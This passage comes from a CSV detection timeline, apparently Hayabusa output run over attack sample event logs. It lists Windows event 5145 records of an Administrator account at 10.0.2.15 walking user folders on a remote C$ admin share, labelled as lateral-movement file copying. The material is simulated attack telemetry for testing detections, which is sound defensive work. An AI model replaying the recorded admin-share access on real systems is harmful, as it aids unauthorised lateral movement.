Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 14:23:22.264 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:22.284 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:22.284 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.356 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.546 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.546 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.556 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.566 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.576 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.586 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.596 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.606 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.616 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.626 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.626 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.626 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.636 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.666 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.676 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.686 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.696 +00:00,PC01.example.corp,5145,info,Collect,Network Share File 